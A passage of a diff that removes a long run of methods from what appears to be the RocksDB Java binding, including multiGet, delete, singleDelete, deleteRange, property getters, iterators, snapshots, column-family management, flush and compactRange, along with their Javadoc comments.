-  public Map<byte[], byte[]> multiGet(final ReadOptions opt,
-      final List<byte[]> keys) throws RocksDBException {
-    assert(keys.size() != 0);
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, opt.nativeHandle_,
-        keysArray, keyOffsets, keyLengths);
-
-    final Map<byte[], byte[]> keyValueMap =
-        new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if(values[i] == null) {
-        continue;
-      }
-
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-
-    return keyValueMap;
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   * <p>
-   * Note: Every key needs to have a related column family name in
-   * {@code columnFamilyHandleList}.
-   * </p>
-   *
-   * @param opt Read options.
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @param keys of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @throws IllegalArgumentException thrown if the size of passed keys is not
-   *    equal to the amount of passed column family handles.
-   */
-  public Map<byte[], byte[]> multiGet(final ReadOptions opt,
-      final List<ColumnFamilyHandle> columnFamilyHandleList,
-      final List<byte[]> keys) throws RocksDBException {
-    assert(keys.size() != 0);
-    // Check if key size equals cfList size. If not a exception must be
-    // thrown. If not a Segmentation fault happens.
-    if (keys.size()!=columnFamilyHandleList.size()){
-      throw new IllegalArgumentException(
-          "For each key there must be a ColumnFamilyHandle.");
-    }
-    final long[] cfHandles = new long[columnFamilyHandleList.size()];
-    for (int i = 0; i < columnFamilyHandleList.size(); i++) {
-      cfHandles[i] = columnFamilyHandleList.get(i).nativeHandle_;
-    }
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, opt.nativeHandle_,
-        keysArray, keyOffsets, keyLengths, cfHandles);
-
-    final Map<byte[], byte[]> keyValueMap
-        = new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if(values[i] == null) {
-        continue;
-      }
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-
-    return keyValueMap;
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(byte[])}
-   */
-  @Deprecated
-  public void remove(final byte[] key) throws RocksDBException {
-    delete(key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final byte[] key) throws RocksDBException {
-    delete(nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(ColumnFamilyHandle, byte[])}
-   */
-  @Deprecated
-  public void remove(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key) throws RocksDBException {
-    delete(columnFamilyHandle, key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final ColumnFamilyHandle columnFamilyHandle,
-                     final byte[] key) throws RocksDBException {
-    delete(nativeHandle_, key, 0, key.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(WriteOptions, byte[])}
-   */
-  @Deprecated
-  public void remove(final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(writeOpt, key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(nativeHandle_, writeOpt.nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * Remove the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #delete(ColumnFamilyHandle, WriteOptions, byte[])}
-   */
-  @Deprecated
-  public void remove(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(columnFamilyHandle, writeOpt, key);
-  }
-
-  /**
-   * Delete the database entry (if any) for "key".  Returns OK on
-   * success, and a non-OK status on error.  It is not an error if "key"
-   * did not exist in the database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpt WriteOptions to be used with delete operation
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final ColumnFamilyHandle columnFamilyHandle,
-                     final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    delete(nativeHandle_, writeOpt.nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final byte[] key) throws RocksDBException {
-    singleDelete(nativeHandle_, key, key.length);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * @param columnFamilyHandle The column family to delete the key from
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key) throws RocksDBException {
-    singleDelete(nativeHandle_, key, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * Note: consider setting {@link WriteOptions#setSync(boolean)} true.
-   *
-   * @param writeOpt Write options for the delete
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final WriteOptions writeOpt, final byte[] key)
-      throws RocksDBException {
-    singleDelete(nativeHandle_, writeOpt.nativeHandle_, key, key.length);
-  }
-
-  /**
-   * Remove the database entry for {@code key}. Requires that the key exists
-   * and was not overwritten. It is not an error if the key did not exist
-   * in the database.
-   *
-   * If a key is overwritten (by calling {@link #put(byte[], byte[])} multiple
-   * times), then the result of calling SingleDelete() on this key is undefined.
-   * SingleDelete() only behaves correctly if there has been only one Put()
-   * for this key since the previous call to SingleDelete() for this key.
-   *
-   * This feature is currently an experimental performance optimization
-   * for a very specific workload. It is up to the caller to ensure that
-   * SingleDelete is only used for a key that is not deleted using Delete() or
-   * written using Merge(). Mixing SingleDelete operations with Deletes and
-   * Merges can result in undefined behavior.
-   *
-   * Note: consider setting {@link WriteOptions#setSync(boolean)} true.
-   *
-   * @param columnFamilyHandle The column family to delete the key from
-   * @param writeOpt Write options for the delete
-   * @param key Key to delete within database
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  @Experimental("Performance optimization for a very specific workload")
-  public void singleDelete(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpt, final byte[] key) throws RocksDBException {
-    singleDelete(nativeHandle_, writeOpt.nativeHandle_, key, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * DB implements can export properties about their state
-   * via this method on a per column family level.
-   *
-   * <p>If {@code property} is a valid property understood by this DB
-   * implementation, fills {@code value} with its current value and
-   * returns true. Otherwise returns false.</p>
-   *
-   * <p>Valid property names include:
-   * <ul>
-   * <li>"rocksdb.num-files-at-level&lt;N&gt;" - return the number of files at
-   * level &lt;N&gt;, where &lt;N&gt; is an ASCII representation of a level
-   * number (e.g. "0").</li>
-   * <li>"rocksdb.stats" - returns a multi-line string that describes statistics
-   *     about the internal operation of the DB.</li>
-   * <li>"rocksdb.sstables" - returns a multi-line string that describes all
-   *    of the sstables that make up the db contents.</li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param property to be fetched. See above for examples
-   * @return property value
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public String getProperty(final ColumnFamilyHandle columnFamilyHandle,
-      final String property) throws RocksDBException {
-    return getProperty0(nativeHandle_, columnFamilyHandle.nativeHandle_,
-        property, property.length());
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final byte[] beginKey, final byte[] endKey) throws RocksDBException {
-    deleteRange(nativeHandle_, beginKey, 0, beginKey.length, endKey, 0, endKey.length);
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param columnFamilyHandle
-   *          {@link org.rocksdb.ColumnFamilyHandle} instance
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final ColumnFamilyHandle columnFamilyHandle, final byte[] beginKey,
-      final byte[] endKey) throws RocksDBException {
-    deleteRange(nativeHandle_, beginKey, 0, beginKey.length, endKey, 0, endKey.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param writeOpt
-   *          WriteOptions to be used with delete operation
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final WriteOptions writeOpt, final byte[] beginKey, final byte[] endKey)
-      throws RocksDBException {
-    deleteRange(nativeHandle_, writeOpt.nativeHandle_, beginKey, 0, beginKey.length, endKey, 0,
-        endKey.length);
-  }
-
-  /**
-   * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-   * including "beginKey" and excluding "endKey". a non-OK status on error. It
-   * is not an error if no keys exist in the range ["beginKey", "endKey").
-   *
-   * Delete the database entry (if any) for "key". Returns OK on success, and a
-   * non-OK status on error. It is not an error if "key" did not exist in the
-   * database.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpt
-   *          WriteOptions to be used with delete operation
-   * @param beginKey
-   *          First key to delete within database (included)
-   * @param endKey
-   *          Last key to delete within database (excluded)
-   *
-   * @throws RocksDBException
-   *           thrown if error happens in underlying native library.
-   */
-  public void deleteRange(final ColumnFamilyHandle columnFamilyHandle, final WriteOptions writeOpt,
-      final byte[] beginKey, final byte[] endKey) throws RocksDBException {
-    deleteRange(nativeHandle_, writeOpt.nativeHandle_, beginKey, 0, beginKey.length, endKey, 0,
-        endKey.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * DB implementations can export properties about their state
-   * via this method.  If "property" is a valid property understood by this
-   * DB implementation, fills "*value" with its current value and returns
-   * true.  Otherwise returns false.
-   *
-   * <p>Valid property names include:
-   * <ul>
-   * <li>"rocksdb.num-files-at-level&lt;N&gt;" - return the number of files at
-   * level &lt;N&gt;, where &lt;N&gt; is an ASCII representation of a level
-   * number (e.g. "0").</li>
-   * <li>"rocksdb.stats" - returns a multi-line string that describes statistics
-   *     about the internal operation of the DB.</li>
-   * <li>"rocksdb.sstables" - returns a multi-line string that describes all
-   *    of the sstables that make up the db contents.</li>
-   *</ul>
-   *
-   * @param property to be fetched. See above for examples
-   * @return property value
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public String getProperty(final String property) throws RocksDBException {
-    return getProperty0(nativeHandle_, property, property.length());
-  }
-
-  /**
-   * <p> Similar to GetProperty(), but only works for a subset of properties
-   * whose return value is a numerical value. Return the value as long.</p>
-   *
-   * <p><strong>Note</strong>: As the returned property is of type
-   * {@code uint64_t} on C++ side the returning value can be negative
-   * because Java supports in Java 7 only signed long values.</p>
-   *
-   * <p><strong>Java 7</strong>: To mitigate the problem of the non
-   * existent unsigned long tpye, values should be encapsulated using
-   * {@link java.math.BigInteger} to reflect the correct value. The correct
-   * behavior is guaranteed if {@code 2^64} is added to negative values.</p>
-   *
-   * <p><strong>Java 8</strong>: In Java 8 the value should be treated as
-   * unsigned long using provided methods of type {@link Long}.</p>
-   *
-   * @param property to be fetched.
-   *
-   * @return numerical property value.
-   *
-   * @throws RocksDBException if an error happens in the underlying native code.
-   */
-  public long getLongProperty(final String property) throws RocksDBException {
-    return getLongProperty(nativeHandle_, property, property.length());
-  }
-
-  /**
-   * <p> Similar to GetProperty(), but only works for a subset of properties
-   * whose return value is a numerical value. Return the value as long.</p>
-   *
-   * <p><strong>Note</strong>: As the returned property is of type
-   * {@code uint64_t} on C++ side the returning value can be negative
-   * because Java supports in Java 7 only signed long values.</p>
-   *
-   * <p><strong>Java 7</strong>: To mitigate the problem of the non
-   * existent unsigned long tpye, values should be encapsulated using
-   * {@link java.math.BigInteger} to reflect the correct value. The correct
-   * behavior is guaranteed if {@code 2^64} is added to negative values.</p>
-   *
-   * <p><strong>Java 8</strong>: In Java 8 the value should be treated as
-   * unsigned long using provided methods of type {@link Long}.</p>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param property to be fetched.
-   *
-   * @return numerical property value
-   *
-   * @throws RocksDBException if an error happens in the underlying native code.
-   */
-  public long getLongProperty(final ColumnFamilyHandle columnFamilyHandle,
-      final String property) throws RocksDBException {
-    return getLongProperty(nativeHandle_, columnFamilyHandle.nativeHandle_,
-        property, property.length());
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator() {
-    return new RocksIterator(this, iterator(nativeHandle_));
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @param readOptions {@link ReadOptions} instance.
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator(final ReadOptions readOptions) {
-    return new RocksIterator(this, iterator(nativeHandle_,
-        readOptions.nativeHandle_));
-  }
-
-   /**
-   * <p>Return a handle to the current DB state. Iterators created with
-   * this handle will all observe a stable snapshot of the current DB
-   * state. The caller must call ReleaseSnapshot(result) when the
-   * snapshot is no longer needed.</p>
-   *
-   * <p>nullptr will be returned if the DB fails to take a snapshot or does
-   * not support snapshot.</p>
-   *
-   * @return Snapshot {@link Snapshot} instance
-   */
-  public Snapshot getSnapshot() {
-    long snapshotHandle = getSnapshot(nativeHandle_);
-    if (snapshotHandle != 0) {
-      return new Snapshot(snapshotHandle);
-    }
-    return null;
-  }
-
-  /**
-   * Release a previously acquired snapshot.  The caller must not
-   * use "snapshot" after this call.
-   *
-   * @param snapshot {@link Snapshot} instance
-   */
-  public void releaseSnapshot(final Snapshot snapshot) {
-    if (snapshot != null) {
-      releaseSnapshot(nativeHandle_, snapshot.nativeHandle_);
-    }
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator(
-      final ColumnFamilyHandle columnFamilyHandle) {
-    return new RocksIterator(this, iteratorCF(nativeHandle_,
-        columnFamilyHandle.nativeHandle_));
-  }
-
-  /**
-   * <p>Return a heap-allocated iterator over the contents of the
-   * database. The result of newIterator() is initially invalid
-   * (caller must call one of the Seek methods on the iterator
-   * before using it).</p>
-   *
-   * <p>Caller should close the iterator when it is no longer needed.
-   * The returned iterator should be closed before this db is closed.
-   * </p>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param readOptions {@link ReadOptions} instance.
-   * @return instance of iterator object.
-   */
-  public RocksIterator newIterator(final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions readOptions) {
-    return new RocksIterator(this, iteratorCF(nativeHandle_,
-        columnFamilyHandle.nativeHandle_, readOptions.nativeHandle_));
-  }
-
-  /**
-   * Returns iterators from a consistent database state across multiple
-   * column families. Iterators are heap allocated and need to be deleted
-   * before the db is deleted
-   *
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @return {@link java.util.List} containing {@link org.rocksdb.RocksIterator}
-   *     instances
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public List<RocksIterator> newIterators(
-      final List<ColumnFamilyHandle> columnFamilyHandleList)
-      throws RocksDBException {
-    return newIterators(columnFamilyHandleList, new ReadOptions());
-  }
-
-  /**
-   * Returns iterators from a consistent database state across multiple
-   * column families. Iterators are heap allocated and need to be deleted
-   * before the db is deleted
-   *
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @param readOptions {@link ReadOptions} instance.
-   * @return {@link java.util.List} containing {@link org.rocksdb.RocksIterator}
-   *     instances
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public List<RocksIterator> newIterators(
-      final List<ColumnFamilyHandle> columnFamilyHandleList,
-      final ReadOptions readOptions) throws RocksDBException {
-
-    final long[] columnFamilyHandles = new long[columnFamilyHandleList.size()];
-    for (int i = 0; i < columnFamilyHandleList.size(); i++) {
-      columnFamilyHandles[i] = columnFamilyHandleList.get(i).nativeHandle_;
-    }
-
-    final long[] iteratorRefs = iterators(nativeHandle_, columnFamilyHandles,
-        readOptions.nativeHandle_);
-
-    final List<RocksIterator> iterators = new ArrayList<>(
-        columnFamilyHandleList.size());
-    for (int i=0; i<columnFamilyHandleList.size(); i++){
-      iterators.add(new RocksIterator(this, iteratorRefs[i]));
-    }
-    return iterators;
-  }
-
-  /**
-   * Gets the handle for the default column family
-   *
-   * @return The handle of the default column family
-   */
-  public ColumnFamilyHandle getDefaultColumnFamily() {
-    ColumnFamilyHandle cfHandle = new ColumnFamilyHandle(this,
-        getDefaultColumnFamily(nativeHandle_));
-    cfHandle.disOwnNativeHandle();
-    return cfHandle;
-  }
-
-  /**
-   * Creates a new column family with the name columnFamilyName and
-   * allocates a ColumnFamilyHandle within an internal structure.
-   * The ColumnFamilyHandle is automatically disposed with DB disposal.
-   *
-   * @param columnFamilyDescriptor column family to be created.
-   * @return {@link org.rocksdb.ColumnFamilyHandle} instance.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public ColumnFamilyHandle createColumnFamily(
-      final ColumnFamilyDescriptor columnFamilyDescriptor)
-      throws RocksDBException {
-    return new ColumnFamilyHandle(this, createColumnFamily(nativeHandle_,
-        columnFamilyDescriptor.columnFamilyName(),
-        columnFamilyDescriptor.columnFamilyOptions().nativeHandle_));
-  }
-
-  /**
-   * Drops the column family identified by columnFamilyName. Internal
-   * handles to this column family will be disposed. If the column family
-   * is not known removal will fail.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void dropColumnFamily(final ColumnFamilyHandle columnFamilyHandle)
-      throws RocksDBException, IllegalArgumentException {
-    // throws RocksDBException if something goes wrong
-    dropColumnFamily(nativeHandle_, columnFamilyHandle.nativeHandle_);
-    // After the drop the native handle is not valid anymore
-    columnFamilyHandle.disOwnNativeHandle();
-  }
-
-  /**
-   * <p>Flush all memory table data.</p>
-   *
-   * <p>Note: it must be ensured that the FlushOptions instance
-   * is not GC'ed before this method finishes. If the wait parameter is
-   * set to false, flush processing is asynchronous.</p>
-   *
-   * @param flushOptions {@link org.rocksdb.FlushOptions} instance.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void flush(final FlushOptions flushOptions)
-      throws RocksDBException {
-    flush(nativeHandle_, flushOptions.nativeHandle_);
-  }
-
-  /**
-   * <p>Flush all memory table data.</p>
-   *
-   * <p>Note: it must be ensured that the FlushOptions instance
-   * is not GC'ed before this method finishes. If the wait parameter is
-   * set to false, flush processing is asynchronous.</p>
-   *
-   * @param flushOptions {@link org.rocksdb.FlushOptions} instance.
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle} instance.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void flush(final FlushOptions flushOptions,
-      final ColumnFamilyHandle columnFamilyHandle) throws RocksDBException {
-    flush(nativeHandle_, flushOptions.nativeHandle_,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(boolean, int, int)}</li>
-   * <li>{@link #compactRange(byte[], byte[])}</li>
-   * <li>{@link #compactRange(byte[], byte[], boolean, int, int)}</li>
-   * </ul>
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange() throws RocksDBException {
-    compactRange0(nativeHandle_, false, -1, 0);
-  }
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange()}</li>
-   * <li>{@link #compactRange(boolean, int, int)}</li>
-   * <li>{@link #compactRange(byte[], byte[], boolean, int, int)}</li>
-   * </ul>
-   *
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final byte[] begin, final byte[] end)
-      throws RocksDBException {
-    compactRange0(nativeHandle_, begin, begin.length, end,
-        end.length, false, -1, 0);
-  }
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange()}</li>
-   * <li>{@link #compactRange(byte[], byte[])}</li>
-   * <li>{@link #compactRange(byte[], byte[], boolean, int, int)}</li>
-   * </ul>
-   *
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final boolean reduce_level,
-      final int target_level, final int target_path_id)
-      throws RocksDBException {
-    compactRange0(nativeHandle_, reduce_level,
-        target_level, target_path_id);
-  }
-
-
-  /**
-   * <p>Range compaction of database.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange()}</li>
-   * <li>{@link #compactRange(boolean, int, int)}</li>
-   * <li>{@link #compactRange(byte[], byte[])}</li>
-   * </ul>
-   *
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final byte[] begin, final byte[] end,
-      final boolean reduce_level, final int target_level,
-      final int target_path_id) throws RocksDBException {
-    compactRange0(nativeHandle_, begin, begin.length, end, end.length,
-        reduce_level, target_level, target_path_id);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, boolean, int, int)}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[])}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[],
-   *   boolean, int, int)}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
